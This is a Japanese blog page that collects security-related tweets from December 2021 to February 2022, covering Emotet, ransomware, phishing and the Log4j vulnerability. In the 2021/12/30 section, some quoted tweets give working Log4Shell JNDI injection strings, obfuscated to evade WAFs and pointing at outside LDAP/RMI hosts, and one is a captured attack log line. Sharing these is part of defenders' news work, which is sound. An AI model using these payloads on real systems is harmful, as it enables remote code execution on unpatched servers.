2022/2/20 セキュリティ関連Twitterメモ
今週の最初の #Emotet のVT上での結果。 1日経って検出は4割強→7割強。 検出が増える間にメールの情報は盗られてる。 このhashは約10分程度のみの出現で、その先はまた別のhash。 だからEmoCheckのような特化ツールが必要。 サンプルは以下。 https://t.co/Fs2oDXPCue https://t.co/zNfLATLq7s https://t.co/tiCRTj4Dlu
— S-Owl (@Sec_S_Owl) Feb 8, 2022
ブログ書きました。この3つのランサムウェアに感染させられてしまった方の参考になればと思います。 「Maze」「Egregor」「Sekhmet」によって暗号化されたファイルの復号メモ | (n)inja csirt https://t.co/ExZISqnZFo https://t.co/UifTL98GpU
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Feb 10, 2022
キヤノンやLGも襲ったMaze、Egregor、Sekhmetランサムウェアの復号キーが公開される | TechCrunch Japan https://t.co/wYruJCEIra
— piyokango (@piyokango) Feb 11, 2022
アップル、AirTagの悪用対策強化へ。不審なAirTagを見つける https://t.co/6CHKuUgZXW https://t.co/neQZvWCUvA
— Impress Watch (@impress_watch) Feb 11, 2022
サイバー攻撃、取り残される病院 「犯行声明、何者?」情報が来ない:朝日新聞デジタル https://t.co/B1nrVRfGok
— piyokango (@piyokango) Feb 12, 2022
FBI、ランサムウェアグループ「BlackByte」による被害に関する情報公開 https://t.co/tGatxOApuw
— モグ|セキュリティゼネラリスト (@moneymog) Feb 15, 2022
NTTデータなど10社、AWSを活用して構築した金融機関のシステムのFISC安全対策基準対応リファレンスを公開 https://t.co/qw2FvrL1j4
— モグ|セキュリティゼネラリスト (@moneymog) Feb 16, 2022
脆弱性管理ツール提供するSnyk、日本でのサービス提供開始 https://t.co/knmQHoCSN7
— モグ|セキュリティゼネラリスト (@moneymog) Feb 16, 2022
一般的なプレースホルダ実装とは挙動が異なるので、「プレースホルダなら安全」とは言えない件。「JSON SQLインジェクション」と呼ばれた挙動に近い。 / “Node.jsのMySQLパッケージにおけるエスケープ処理だけでは防げない「隠れた」SQLインジェクション - Flatt Security …” https://t.co/EdceShLhfo
— 徳丸 浩 (@ockeghem) Feb 16, 2022
はてなブログに投稿しました #はてなブログ 2022年2月に発生したウクライナへのDDoS攻撃についてまとめてみた - piyolog https://t.co/mqR20WnR6Z
— piyokango (@piyokango) Feb 16, 2022
Alert (AA22-047A) Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology | CISA https://t.co/qzbwh6jFi1
— piyokango (@piyokango) Feb 16, 2022
「オープンソース 欠陥修正に弱点 ソフト8に脆弱性」という残念なタイトルの記事が…。未知の脆弱性はどこにでもあり得るしオープンソース以外のソフトウェアでの割合と比較しないとアンフェア。記事の内容はオープンソースの脆弱性対応が有志頼みで利用者や企業が支援すべきという適切な内容なのに
— 森崎 修司/ソフトウェアエンジニアリング研究者 (@smorisaki) Feb 17, 2022
脆弱性の修正にかかる平均時間は52日に短縮--グーグルのProject Zeroが報告 - ZDNet Japan https://t.co/YRukzUWbAl
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Feb 18, 2022
公的機関のサイトならhttps://t.co/TJc6gDAagJなりhttps://t.co/0V06KhxVKiを使えば安全なのに受託業者が勝手に汎用ドメインを取りたがる / “東京都が病院にポスターはがしを依頼した真相、ドメイン取引の怖い話” https://t.co/3GVKktTlAi
— Masanori Kusunoki / 楠 正憲 (@masanork) Feb 18, 2022
How Trickbot works internally when it comes to targeting customers of 60 high-profile organizations? Read our technical research of three key Trickbot modules along with description of used evasion techniques. https://t.co/B45RTFX1zn
— Check Point Research (@_CPResearch_) Feb 19, 2022
2022/2/8 セキュリティ関連Twitterメモ
ルートはメルカリでしたか。しかし、購入した「中古HD」のデータを復元してしまう”善意の”匿名通報者は、どういった方なのかも気になる所です。 「元従業員の売却HDD内に業務文書、データ複製の連鎖で - ラック」 https://t.co/NYBjMVlRgm
— キタきつね (@foxbook) Jan 17, 2022
企業に仕掛けられた謎のRaspberry Piを追跡して実行犯を突き止めるまで https://t.co/FTAsNZ0685
— モグ|セキュリティゼネラリスト (@moneymog) Jan 19, 2022
約5000の学校へ影響したランサムウェア事案へのFinalsite社による対応メモ https://t.co/iZ2ht2Q8KI
— モグ|セキュリティゼネラリスト (@moneymog) Jan 19, 2022
明日はコインハイブ事件の最高裁判決です。弁論において弁護人が述べた内容を掲載しておきます https://t.co/HB3gq1IPb8
— スドー?? (@stdaux) Jan 19, 2022
良かった! / “仮想通貨の無断「採掘」、逆転無罪 最高裁判決” https://t.co/Ee0XYzJcDD
— 齊藤貴義@『Wizard Bible事件から考えるサイバーセキュリティ』 (@miraihack) Jan 20, 2022
Death from Above: Lateral Movement from Azure to On-Prem AD #infosec #pentest #redteam https://t.co/CSxHLl7I5D https://t.co/IWSgQDF3wD
— Florian Hansemann (@CyberWarship) Jan 20, 2022
Thanks to Firmware Scanner of our anti-rootkit set of techs we identified a new cyberattack #MoonBounce. The malicious implant is placed directly on SPI flash and is capable of persisting in the system across reboot or disk replacement. Details ?? https://t.co/L3TKVtzkro https://t.co/As800rR35X
— Eugene Kaspersky (@e_kaspersky) Jan 20, 2022
2022-01-20 (Thursday) - Two #Emotet infection examples with #spambot activity - One #epoch4 infection and one #epoch5 infection - #pcap files, malware samples, IOCs, and some email examples from the unencrypted spambot traffic available at: https://t.co/L16wVinByE https://t.co/Na3QujRz6F
— Brad (@malware_traffic) Jan 22, 2022
そういえば、弊社最近「オンサイト診断手当」なる社内制度が爆誕したみたいです。 その名の通り、脆弱性診断員に特化した制度で、オンサイトで診断作業した際に別途特別手当がもらえるらしい。他の会社でこういうのあるのかな?個人的には「それで手当もらえるの?」ってちょっとビックリした。
— とある診断員 (@tigerszk) Jan 26, 2022
1月25日から新型DeadBoltランサムウェアがQNAP NASを標的に侵害中 https://t.co/avhJZvIs2D 真偽不明ですがゼロデイ脆弱性を悪用してるらしく、至急でインターネットからのアクセス制限を行う必要があります。WW/JPで327149/14990台外部公開か(図1 すでにWW/JPで約600/20が暗号化されています(図2 https://t.co/3IPt4z52xU
— nekono_nanomotoni (@nekono_naha) Jan 27, 2022
「サイバー攻撃受けた北朝鮮、6時間全てのインターネット通信網が停止」-Chosun online 朝鮮日報 https://t.co/im1NLPDb0h
— piyokango (@piyokango) Jan 27, 2022
情報セキュリティ10大脅威 2022 https://t.co/5Vh1qnn03p 個人の脅威1位がとうとうフィッシング詐欺になりました。 https://t.co/SepWkkD2Sk
— にゃん☆たく (@taku888infinity) Jan 27, 2022
セキュリティの見直しを命じられてて、Azure AD の運用項目一覧欲しいんですっていうのたまにお願いされるのですが、これでいいですね。 https://t.co/atnPcFHYA7
— Yusuke Kodama (@YusukeKodama85) Jan 28, 2022
NISCから、「東京2020大会におけるサイバーセキュリティ対策結果報告(総括)」が出てる。 セキュリティ対策として、リスク対策や教育、大会中の活動、今後の活動、などが総括されていた。 https://t.co/GmGVFG7tQs
— 四川麻婆豆腐 の海 (@hogehuga) Jan 28, 2022
講談社など、米ITを提訴へ 漫画サイト海賊版のデータ配信 https://t.co/nN0z7UwUuM
— piyokango (@piyokango) Jan 29, 2022
病院が攻撃されることはヤバイとなんとなくで言ってしまっている自分がいる気がしていたので調べました。メモしました。ブログに書きました。 ある記事をきっかけに医療施設「徳島県つるぎ町立半田病院」について調べたメモ | (n)inja csirt https://t.co/ObC1BtITuP
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Jan 29, 2022
CISSP Cheatsheet Credit https://t.co/kU5t4ZToUw #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #CyberSec #networking #networksecurity #isaca #cybersecuritytraining https://t.co/4aC9Y7KQ8k
— Hacking Articles (@hackinarticles) Jan 30, 2022
Week 05 - 2022 #DFIR https://t.co/B2UYenNQun
— Phill Moore (@phillmoore) Jan 30, 2022
「ウイルス感染」にご用心 サポート詐欺、被害高止まり―国民生活センター:時事ドットコム https://t.co/2oDn3cOlxO
— Autumn Good (@autumn_good_35) Jan 31, 2022
実際にメールを送るフィッシング訓練は逆効果と、スイス・チューリッヒ工科大学の博士課程学生が従業員数数万人規模の企業と行った共同研究。訓練メールに引っかかった被験者は、実際のフィッシングにもより引っかかりやすくなったとのこと。 https://t.co/oUUClMtPNc
— kokum?t? (@__kokumoto) Jan 31, 2022
SambaにRCEの脆弱性CVE-2022-44142が発見。レポータがDEVCORE??さんということで要警戒 https://t.co/wVgEKm3XdZ Sambaを露出するサーバはWW/JPで183k/2.4kありますが影響を受けるv4.1以上に絞ると6.8k/1.5kになります その殆どがVPSやレンサバで企業ユースは少なそうですが、1割程度はありそうです https://t.co/6BgGswQFmF
— nekono_nanomotoni (@nekono_naha) Feb 1, 2022
Windows Updateクライアント悪用してマルウェアに感染させる攻撃確認イバー攻撃 https://t.co/KbqaDrwkXN
— モグ|セキュリティゼネラリスト (@moneymog) Feb 1, 2022
自社で受信する #Emotet の本日分を見た所いずれも新しい感染フローのものになっていました また弊社の場合、パターン(本文、送信元、ファイル配送方法)を変えて何度も特定宛先に送られて来ます。傾向は組織により異なる場合もありますが、一度受信したアドレスの監視は強化することをお勧めします https://t.co/7o41tIqxLy https://t.co/sFGajFTXRZ
— nekono_nanomotoni (@nekono_naha) Feb 2, 2022
子供が小学校から持って帰ってきた文書、セキュリティ側の人間からすると違和感しかない。 1年経ったから情報セキュリティの観点からパスワード変更?意味わからん。理由になってない。 パスワードをこの紙に記載の上教師に提出?パスワードは個人に帰属でしょ。@Chigasaki_city #茅ヶ崎市 https://t.co/qSo2eafUTv
— hiro_ (@papa_anniekey) Feb 3, 2022
みんなパスワードに2020とか2021とか入れるようになりそうやな。 そもそも子供に(というか大人にも)(オンライン攻撃に耐え得る)パスワードを決めさせ入力させるところに無理がある。Webサービスはログインしっぱなしにして、端末ロック解除(生体認証、PIN)で使うようにするべき。 https://t.co/vO37tmJPvV
— Hiromitsu Takagi (@HiromitsuTakagi) Feb 4, 2022
Cloud security standards #cybersecurity https://t.co/6gXWsmTrKZ
— LetsDefend (@LetsDefendIO) Feb 4, 2022
よく見るとアマ「ソ」ン…SMS使うフィッシング詐欺「スミッシング」被害急増 気づきづらい巧妙な手口 https://t.co/dwP1d0yb6N
— piyokango (@piyokango) Feb 5, 2022
BlackCatランサムは実行時にトークンを指定するようになっていて、そのトークンを使って実行、生成されたランサムノート(脅迫状)を見ないと交渉サイトのアドレスが分からないようにしているんですね。トークンを変更して何度か感染してみましたが生成されるアドレス(パラメータ)が異なってました。 https://t.co/LE7dNsBFh6
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Feb 6, 2022
北朝鮮が仮想通貨58億円盗む サイバー攻撃で 国連安保理パネル | 毎日新聞 https://t.co/y2jrqsNaZR
— piyokango (@piyokango) Feb 6, 2022
サイバー攻撃と戦う人材育成や、国内の情報セキュリティ意識の向上を目指し、サイバーセキュリティに関わる仕事について分かりやすく紹介する『サイバーセキュリティ仕事ファイル 1』を公開しました。 https://t.co/b5Kot0vh5C ? ?#株式会社ラック #サイバーセキュリティ
— ラック公式 (@lac_security) Feb 7, 2022
PowerPointファイルを悪用して実行可能ファイルを配布する攻撃手法とは https://t.co/pKzketfDkN
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Feb 7, 2022
Emotet感染報告、国内企業から相次ぐ ライオン、テスコムなど(要約) - ITmedia NEWS https://t.co/s7XrsNNBlU
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Feb 7, 2022
(社説)サイバー捜査 警察庁が担う重い課題:朝日新聞デジタル https://t.co/di2cBUuvuD
— モグ|セキュリティゼネラリスト (@moneymog) Feb 7, 2022
報告書が公開される予定のようで期待。 米政府、セキュリティ事件を検証する委員会を新設--最初の対象はLog4j - ZDNet Japan https://t.co/Rx2s0bzqkz
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Feb 7, 2022
The 3 Most Common Causes of Data Breaches in 2021 https://t.co/ygusSWoyDe #CyberSecurity #digital #Hackers #infosec @reach2ratan #malware #cloud #cloudsecurity #dataprotection #Privacy #infosec #informationsecurity #cloudcomputing https://t.co/xnCPZV88dv
— Ratan Jyoti (@reach2ratan) Feb 7, 2022
2022/1/18 セキュリティ関連Twitterメモ
Today, we're open sourcing a log4j JAR scanner. Throw it at a filesystem, detect vulnerable JARs, and even rewrite them in place. Includes a Go API to import the JAR parsing for other applications. https://t.co/TWC4SJFm3p
— Eric Chiang (@erchiang) Dec 29, 2021
Best of Cyber Security #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #internet #networking #riskmanagement #compliance https://t.co/9CSDbhO8xq
— Hacking Articles (@hackinarticles) Jan 1, 2022
はてなブログに投稿しました #はてなブログ Windowsイベントログ解析ツール「Hayabusa」を使ってみる - itiblog https://t.co/23QwmMhF61
— いちび (@itiB_S144) Dec 31, 2021
ねんきんネット パスワードだけでなく、秘密の質問と答えまで定期変更を要求される?? https://t.co/kugqxGEC86
— ipusiron@『Wizard Bible事件から考えるサイバーセキュリティ』 (@ipusiron) Dec 31, 2021
「箱根駅伝」で検索すると、偽の動画サイトからクレジットカード情報を盗まれる詐欺サイトが出ています。 まずは動画配信各社の公式サイトに行って、そこから探すようにしてください。 YouTube: https://t.co/6UKodGBgNR 日テレ: https://t.co/bHAWXleFzs #フィッシング #phishing #箱根駅伝 #詐欺 https://t.co/ZQtq0NltjS
— Osumi, Yusuke (@ozuma5119) Jan 3, 2022
Azure Privilege Escalation via Azure API Permissions Abuse #infosec #pentest #redteam https://t.co/uMLobqbLmL https://t.co/TsSzLdvOYg
— Florian Hansemann (@CyberWarship) Jan 3, 2022
Hacking Tool CheatSheet #infosec #cybersecurity #Pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #Infosys #CyberSec #INTERNET #hacking #tools https://t.co/24xVwIDy5T
— PentestSky (@pentestsky) Jan 2, 2022
オシント新時代・荒れる情報の海:/4 ディープフェイク、脅威拡大(その1) 顔認証、容易に突破 無料アプリで合成動画 | 毎日新聞 https://t.co/HVrfAvjigg
— piyokango (@piyokango) Jan 3, 2022
対応に当たった方々本当にお疲れ様でした。 この件ではいくつの課題と教訓が浮き彫りになったのではないかと思います。 その1つとしてIT化された業務に支障を来した場合の回避、緩和策の準備が挙げられると思います。 これは病院だけに言えることではありません。 https://t.co/ffn5ap9w5A
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Jan 5, 2022
Amazonや宅配装うSMS攻撃3倍に ドコモなど対策急ぐ: 日本経済新聞 https://t.co/SSTI2DAPWn
— piyokango (@piyokango) Jan 5, 2022
はてなブログに投稿しました #はてなブログ 氏名と生年月日でパスワードを割り出していたSNSの不正アクセス事案についてまとめてみた - piyolog https://t.co/5RtEPYBis7
— piyokango (@piyokango) Jan 10, 2022
オシント新時代~荒れる情報の海:卒業証書、停電、リュック… 何気ないSNS投稿に潜む落とし穴 | 毎日新聞 https://t.co/RNYQGEl08E
— piyokango (@piyokango) Jan 10, 2022
サイバー保険を不要と考える場合は、NISTやCMMC(サイバーセキュリティ機能成熟度モデル認定)を取り入れる事を推奨しています。 一方で保険加入条件も年々(海外では)厳しくなっています。 「ビジネスの視点:サイバーセキュリティ保険はビジネスに必要と思われる」 https://t.co/0prQmtz0TP
— キタきつね (@foxbook) Jan 9, 2022
ECサイトからのカード情報窃取より、フィッシングの方が被害が多い。。。 “カード情報”盗むフィッシング詐欺が急増(日本テレビ系(NNN)) #Yahooニュース https://t.co/rmg3g2wY3I
— キタきつね (@foxbook) Jan 11, 2022
昨年1年間、観察・記録したランサムに関するまとめをブログに書きました。 標的型ランサム観察記 2021年振り返り版 全体編 | (n)inja csirt https://t.co/UrZiJCnHTz https://t.co/GPkHJIoOah
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Jan 12, 2022
食べログ、裁判でアルゴリズム「異例」の開示 評価透明化なるか | 毎日新聞 https://t.co/0sT6GLL3E9
— piyokango (@piyokango) Jan 12, 2022
ランサム攻撃を受けたらどうする? JPCERT/CCが初動対応FAQを公開 https://t.co/5HdkX5ir8Q
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Jan 13, 2022
API Security Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API. https://t.co/h1fMATbzwA #cybersecurity #api #hacking #bughunting https://t.co/Q5GQ9nLxg8
— Devansh (?, ??) (@0xAsm0d3us) Jan 13, 2022
サイバー攻撃の高度化に伴い、セキュリティ担当者にも高度なスキルが求められるようになりました。そのスキルを証明するための、セキュリティ資格について、どんな種類があって、それぞれどのような取得メリットがあるのかを解説しました! https://t.co/aXNMPIA4A5
— NRIセキュア 公式 (@NRIST) Jan 14, 2022
現在ウクライナの政府系サイトが複数ハッキングを受け、落ちて開けないか、こんな奇妙な反ウクライナ画像が表示されている(これは農業政策省サイト)。内容は、「ウクライナ人(※単数系)よ!全ての個人情報は公開ネットワーク上にアップロードされた…更なる悪い事態を恐れて待て」と書かれている。 https://t.co/6hvG2nBX8w
— Hirano Takashi / 平野高志 (@hiranotakasi) Jan 14, 2022
ウクライナ政府サイトに大規模サイバー攻撃 写真1枚 国際ニュース:AFPBB News https://t.co/cde361pcto
— piyokango (@piyokango) Jan 14, 2022
〈独自〉閲覧履歴提供に本人同意 LINE問題受けIT規制案判明 - 産経ニュース https://t.co/rY31Azp35Q
— piyokango (@piyokango) Jan 13, 2022
Russian government arrests REvil ransomware gang members - @Ionut_Ilascu https://t.co/vXq033CHS0
— BleepingComputer (@BleepinComputer) Jan 14, 2022
#Emotet 2022-01-14 Spamming activities continues on Epoch 5 We have updated https://t.co/KPe1mUckkN database with 2022-01-13 data and ioc In the graph below the top 10 of TLD recipient, new entry United Arab Emirates with a lot of reply-chain @58_158_177_102 @sugimu_sec @bomccss https://t.co/lh7Pvim5YD
— TG Soft (@VirITeXplorer) Jan 14, 2022
ハッカー攻撃にベラルーシ情報機関関与、ウクライナ高官が指摘 https://t.co/LJqgh4qGMW
— ロイター (@ReutersJapan) Jan 16, 2022
2021/12/30 セキュリティ関連Twitterメモ
Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF : https://t.co/f3Fi7E34TY
— H4x0r-DZ (@h4x0r_dz) Dec 11, 2021
Apache Log4j2 2.14.1 RCE (CVE-2021-44228) ??Bypass WAF 1. ${jndi:ldap://127.0.0.1:1389/ badClassName} 2. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} 3. ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} 4. ${jndi:rmi://adsasd.asdasd.asdasd}
— Jinwook Kim (@wugeej) Dec 12, 2021
これ、見る人がみればわかりますが、環境変数にAWS ACCESS KEYを設定している物をみつけて情報を摂取するものですね。名前解決をした時点でホストにKEY VALUEが載ってくるので、次の攻撃へと悪用するかと。 https://t.co/Gj5VgHTIlP
— hiro_ (@papa_anniekey) Dec 14, 2021
立法趣旨からは違法でないはずだが検挙されてしまう可能性があるのが現状、とでも書いてほしいところ / “「Log4j」の脆弱性を突く攻撃手段の情報共有は違法? 日本ハッカー協会に聞いた” https://t.co/hRPfZkBYV6
— 徳丸 浩 (@ockeghem) Dec 14, 2021
IC乗車券の利用日が約20年前になる障害、要因はGPS「週番号」のリセット https://t.co/lY50rvg4TL
— にゃん☆たく (@taku888infinity) Dec 14, 2021
MDIS、「統合認証サービス MistyAuth」を2022年4月から提供 https://t.co/2byZVgeD2B
— モグ|セキュリティゼネラリスト (@moneymog) Dec 14, 2021
この辺の動きは当然犯罪者もチェックしてるでしょうね。 みずほ銀行のQRコード決済「J-Coin Pay」 全国74の信用組合と口座接続開始 - ITmedia ビジネスオンライン https://t.co/c3kYAtXeac
— Autumn Good (@autumn_good_35) Dec 14, 2021
一番わかりやすい図解かと #log4shell #log4j https://t.co/Un40iU7VqZ
— 無気力マン (@__motojiro__) Dec 12, 2021
Scutumでは12/11時点でLog4j攻撃の難読化に対応が済んでいます。シグネチャ型のWAFだと難しそうですが、ウチは色々やれるので… https://t.co/ljXqa0oUzU
— Kanatoko (@kinyuka) Dec 13, 2021
Log4Shell脆弱性に対する追加の対処が施された「Apache Log4j 2.16.0」がリリース - 窓の杜 https://t.co/9tDh7RcnEx @madonomoriより
— にゃん☆たく (@taku888infinity) Dec 14, 2021
SECCON CTF 2021 writeup - st98 の日記帳 - コピー https://t.co/akm1PW6u39 書きました
— st98 (@st98_) Dec 14, 2021
Log4j の脆弱性の Port53 で通信を試行しようとしているもの。 (自宅のサーバにもこのパターンが着信したのでぺたり) https://t.co/8QSkwuayCS
— みむら (@mimura1133) Dec 15, 2021
なんかやってみた https://t.co/V9ShcymhZG
— hiro_ (@papa_anniekey) Dec 15, 2021
#Emotet のメール送信は12/10以降確認してません。 Emotetが11/26,30,12/7に使っていたAdobeを騙ったアプリインストーラーによる感染手法ですが、使われていた脆弱性 CVE-2021-43890 が本日配信された12月のWindowsUpdateで修正されましたので早期に更新しましょう。 https://t.co/WjW7Fvs82n
— bom (@bomccss) Dec 15, 2021
Ohh, the Russian IP that's doing Windows AD user recon switched to obfuscating "jndi" too: 45.146.164.160 - - [14/Dec/2021:07:18:35 +0200] "GET / HTTP/1.1" 403 135 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}"
— Vess (@VessOnSecurity) Dec 14, 2021
「Log4Shell」攻撃、少なくとも12月初頭より展開 - PoC公開以前についても確認を https://t.co/LxBiF22jGx 『現地時間12月2日には同脆弱性に関する攻撃者の活動が観測されていたことを明らかにし、同脆弱性に対する探索行為や悪用など調査する場合は、数週間前までさかのぼって調べるよう呼びかけた』
— にゃん☆たく (@taku888infinity) Dec 15, 2021
マカフィー、「2021年の10大セキュリティ事件」を発表、第1位は? https://t.co/bneTqxXNye
— モグ|セキュリティゼネラリスト (@moneymog) Dec 15, 2021
Just bypassed AWS WAF for log4j jndi injection: ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} Anyone who care to share Akamai Bypass? #bugbountytips https://t.co/QaoavD326z
— xxux11 ? ? (@11xuxx) Dec 15, 2021
鳥取県のシステムにサイバー攻撃 ファイル暗号化される被害|NHK 鳥取県 https://t.co/eBLCaii6D1 “被害にあったのは、県が東京の建設コンサルタント会社に運用を委託し、県内の森林所有者およそ5万人分の名前や、民有林の情報などを保管している「鳥取県森林クラウドシステム」というシステムです”
— ねこさん?(ΦωΦ) (@catnap707) Dec 16, 2021
Log4jの件では珍しく(?)難読化によるWAFの回避が話題になっていましたが、その辺についてブログ書いてみました。Scutumでは今回はシグネチャ・正規表現で頑張るのはキツイと判断して、独自にパーサを書いて対応しています。 https://t.co/r2Kkmjy4vS
— Kanatoko (@kinyuka) Dec 16, 2021
CERT/CC has released a Log4Shell scanner https://t.co/6SxzSwOTbR https://t.co/zHdTWcKVEf
— Catalin Cimpanu (@campuscodi) Dec 16, 2021
CVE-2021-45105(DoS脆弱性。CVSS値は 7.5)がまた1つ見つかり(lookupの無限再帰を起こすパターンが見つかった)、Log4jは2.17.0に…。Shellshockの時のbash泥沼修正の再来? / Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability https://t.co/0O7E1aUeMI via @TheHackersNews
— wakatono, Ph.D.(JK)(Fully Vaccinated)(3末までに休暇11日) (@wakatono) Dec 18, 2021
Looks like it’s missing the step where you post something on Twitter #log4j #logforge #l4j https://t.co/6zzGdpSuu0
— pwneip (@pwnEIP) Dec 18, 2021
Fridaを用いてマルウェアの動作を解析・変更する - NTT Communications Engineers' Blog https://t.co/7kPeipuWLV
— ほよたか (@takahoyo) Dec 21, 2021
obj_31337 skimmer via bootstrap2[.]xyz. Malicious JavaScript is hidden within victim's own logo. #Magecart https://t.co/86NpKF4CB9
— Malwarebytes Threat Intelligence (@MBThreatIntel) Dec 20, 2021
Nmap Cheatsheet for OSCP #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #linux #unix #nmap https://t.co/APWxN2nP9v
— Hacking Articles (@hackinarticles) Dec 21, 2021
Alert (AA21-356A) Mitigating Log4Shell and Other Log4j-Related Vulnerabilities https://t.co/KKJnEIBgcW
— piyokango (@piyokango) Dec 23, 2021
The day when the AWS Support got access to your S3 data. In this thread, you will find details about the security incident that leads to this unattended access for millions of AWS customers. ??
— Victor Grenu (@zoph) Dec 23, 2021
Log4j RCE CheatSheet https://t.co/wUNXWKiYf5
— LetsDefend (@LetsDefendIO) Dec 22, 2021
「Apache Log4j」の脆弱性を中国政府に最初に報告しなかったとしてAlibaba Cloudにペナルティ https://t.co/jTlGgRgu46
— モグ|セキュリティゼネラリスト (@moneymog) Dec 23, 2021
Microsoft MSHTMLの脆弱性「CVE-2021-40444」に対する修正パッチを回避する新たな攻撃 | TECH+ https://t.co/pnlqmwOfgI
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Dec 25, 2021
【独自】日米、「ランサムウェア」対策で連携へ…中露のサイバー攻撃を意識 : 政治 : ニュース : 読売新聞オンライン https://t.co/t9Fb5ViTr2
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Dec 26, 2021
JNSA版の十大ニュース。これを見ても、今年「も」色々あったなと思います。 JNSA 2021 セキュリティ十大ニュース発表、「ランサムウェアの脅威」「LINEデータ管理不備」「みずほ銀行」他 https://t.co/Z2hofX3QxR
— キタきつね (@foxbook) Dec 27, 2021
書きました>スクリーンショットによるツイート引用は著作権侵害との判決(栗原潔) - 個人 - Yahoo!ニュース https://t.co/N1XZ0yZD3C
— Kiyoshi Kurihara (@kurikiyo) Dec 29, 2021
この判決だとテレビがツイートを無断引用するのは全て著作権侵害だな。(著作権法の引用の趣旨がそんなものなわけがなかろうて。) https://t.co/wTEPfbxH6m
— Hiromitsu Takagi (@HiromitsuTakagi) Dec 29, 2021
2021/12/12 セキュリティ関連Twitterメモ
I've just published "MAS" Article 1 -- version 1.1. As I'd simplified the original script on page 30, I left (by mistake) two dead lines there (now both removed) The new version (A.1) of the PDF (and next updates) will be published here: https://t.co/CqJcmTzygA #malware https://t.co/JASeRCzxKA
— Alexandre Borges (@ale_sp_brazil) Dec 4, 2021
11月の #ランサムウェア リーク確認数 カッコ内は前月確認数 1???#Lockbit2 86(82) 2???#CONTI 47(46) 3???#Grief 10(15) 4???#CL0P 5(11) 5???#BlackMatter 1(12) 6???#Ragnar 1(2) 7???#RansomExx 1(1) 8???#Revil 0(3) 9???#Nefilim 0(0) 9???#Prometheus 0(0) 9???#DoppelPaymer 0(0) Total 151 https://t.co/vTFTCxjISw
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Dec 5, 2021
CVE数の動向と考察(2021年版)Part1 https://t.co/lSc6zxyUGj
— piyokango (@piyokango) Dec 6, 2021
おお!事業者(LINE、Yahoo!、PayPay/PayPay銀行)共催のフィッシング詐欺サイトバウンティキャンペーンですか! これは素晴らしい企画。 意外と他で実施していないですよね?私が知らないだけ? 参加方法も手軽なのが素晴らしい。 https://t.co/XasHqaCwHb
— Noriaki Hayashi (@v_avenger) Dec 6, 2021
Best of CTF Walkthrough for OSCP https://t.co/AIUdoUaDV6 https://t.co/JxuTswFwbn https://t.co/HLfe9mGFVN #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #itsecurity #cissp #redteam #hackingtools #linux https://t.co/j7ZQyBwQxl
— Hacking Articles (@hackinarticles) Dec 7, 2021
『「次の1日間、BTCに送られるすべての支払いを2倍にします。あなたは1000ドル送ります。私はあなたに2000ドル送り返します」』 アンジャッシュ渡部、インスタに不正アクセスか?ストーリーに怪しげ文書アップ/芸能/デイリースポーツ online https://t.co/jDLK6FpiCe
— Autumn Good (@autumn_good_35) Dec 7, 2021
Love this Ransomware Playbook published by Canadian Centre for Cyber Security: https://t.co/8TA0xZl4wK https://t.co/PADQ2phAgi
— Seongsu Park (@unpacker) Dec 7, 2021
GitHub上のsensitive dataを削除するための手順と道のり https://t.co/I86XBcoJvt
— モグ|セキュリティゼネラリスト (@moneymog) Dec 7, 2021
フィッシング詐欺やマルウェアなど、セキュリティ対策の最新動向を専門家らが解説【JPAAWG 4th General Meeting】 - INTERNET Watch https://t.co/HJWWYh4GNq @internet_watchより
— にゃん☆たく (@taku888infinity) Dec 8, 2021
ランサムウエア配信システムに危機感 - 2022年版ソフォス脅威レポート https://t.co/027539M2yD
— モグ|セキュリティゼネラリスト (@moneymog) Dec 8, 2021
GitHub上のsensitive dataを削除するための手順と道のり | メルカリエンジニアリング https://t.co/5MwS26C7qq
— piyokango (@piyokango) Dec 9, 2021
オミクロン株で偽メール 厚労省装い、情報流出恐れ | 共同通信 https://t.co/Jc54sVNEz4
— piyokango (@piyokango) Dec 9, 2021
log4j 各?网?已?笑死 ???史了 https://t.co/erJvuze4Sn
— ?面 (@zhimian000) Dec 9, 2021
RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec https://t.co/hxoTYC5nSt Javaでログ出力するために使われるライブラリlog4j 2のRCEの0-day脆弱性がやばそう。裏で実はlog4j 2を使っているということもありそうなので、影響範囲を特定するのが難しそう
— ほよたか (@takahoyo) Dec 10, 2021
log4jのセキュリティバグ、すごいな。任意コード実行というけど、ほんとに任意コード実行じゃん(インターネットから簡単に任意のJavaクラスファイルをロードして実行させられる)。
— Rui Ueyama (@rui314) Dec 10, 2021
マイクラもハッキング ~「Apache Log4j」ライブラリに致命的なリモートコード実行のゼロデイ脆弱性/かなり広範囲に影響か。一刻も早い対策が望まれる【やじうまの杜】 https://t.co/lUUfGMhVIp https://t.co/kKVe89M8kk
— 窓の杜 (@madonomori) Dec 10, 2021
